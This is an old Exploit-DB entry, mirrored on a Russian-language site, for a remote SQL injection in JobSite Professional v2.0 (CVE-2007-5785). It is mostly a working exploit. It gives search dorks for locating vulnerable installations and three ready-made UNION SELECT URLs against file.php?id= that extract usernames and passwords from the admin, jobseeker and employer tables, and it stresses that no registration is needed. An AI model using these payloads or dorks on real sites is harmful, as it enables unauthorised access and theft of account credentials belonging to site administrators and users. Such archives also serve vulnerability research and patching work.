- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4576
- Проверка EDB
-
- Пройдено
- Автор
- ZYNBER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5785
- Дата публикации
- 2007-10-28
Код:
#########################################################################
JobSite Professional v2.0 Remote SQL Injection Vulnerability
#########################################################################
## AUTHOR : ZynbER
## HOME : NoWhere
## Script WebSite:
http://www.jobsiteprofessional.com
## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version : inurl:index.php?page=fr_Candidats
## EXPLOITS :
Vulnerability in (File.php?id=)
http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*
http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*
http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*
## Note
No registration is needed!!
## GREETZ : MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa
#########################################################################
JobSite Professional v2.0 Remote SQL Injection Vulnerability
#########################################################################
# milw0rm.com [2007-10-28]- Источник
- www.exploit-db.com
